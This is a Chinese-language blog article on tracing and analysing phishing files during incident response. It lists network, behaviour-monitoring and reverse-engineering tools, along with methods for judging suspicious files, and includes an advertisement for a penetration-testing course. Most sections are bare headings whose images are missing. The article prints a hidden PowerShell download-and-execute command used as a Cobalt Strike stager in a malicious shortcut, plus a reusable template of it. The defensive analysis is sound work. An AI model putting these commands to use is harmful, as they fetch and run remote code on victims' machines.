钓鱼文件应急溯源:方法篇
【推荐学习】暗月渗透测试培训 十多年渗透经验,体系化培训渗透测试 、高效学习渗透测试,欢迎添加微信好友aptimeok 咨询。
恶意软件分析技术的市场
常见的分析技术
-
静态恶意软件分析
-
动态恶意软件分析
-
混合恶意软件分析
常见的检测工具展示
网络分析工具
-
NetLimiter

-
CurrPorts

-
TeaPot

-
HTTPDebuger

行为监控工具
-
DiffView

-
火绒剑


-
Comodo

反编译与调试工具
-
GDA 与Frida


-
x64dbg

知识扩展
思路

恶意软件作者:使用高级语言编写恶意程序
计算机:CPU识别代码进行执行
恶意软件分析人员:通过反编译手段进行分析
发包函数


漏洞利用类钓鱼
模拟


真实背景利用案例



模拟分析
-
网络分析示例
请求地址-
http://192.168.86.144/word.cab

-
行为监控分析示例

-
解包查看


-
下载分析


-
解析

-
反汇编定位





溯源
-
埃文
-
BestTrace
-
备案、Whois、威胁情报查询系统
判断
-
后缀名与显示的logo

-
文件类型

-
hash


-
时间戳


-
邮件信息

-
打开判断

-
专业工具

-
扫描

-
代码分析

-
快捷方式


C:WindowsSystem32WindowsPowerShellv1.0powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://120.48.85.228:80/favicon’))”
常见的cs上线命令

powershell.exe -nop -w hidden -c IEX (new-object net.webclient).downloadstring(‘’)
案例讲解
-
快捷方式


-
标题诱导



-
执行监控


网上分析示例
-
属性查看

-
反编译逐步分析






查杀
-
扫描查杀思路图

-
专业扫描工具

-
弱点扫描

总结
-
对于文件

-
内存层防护与监控

原创文章,作者:mOon,如若转载,请注明出处:https://www.moonsec.com/9173.html

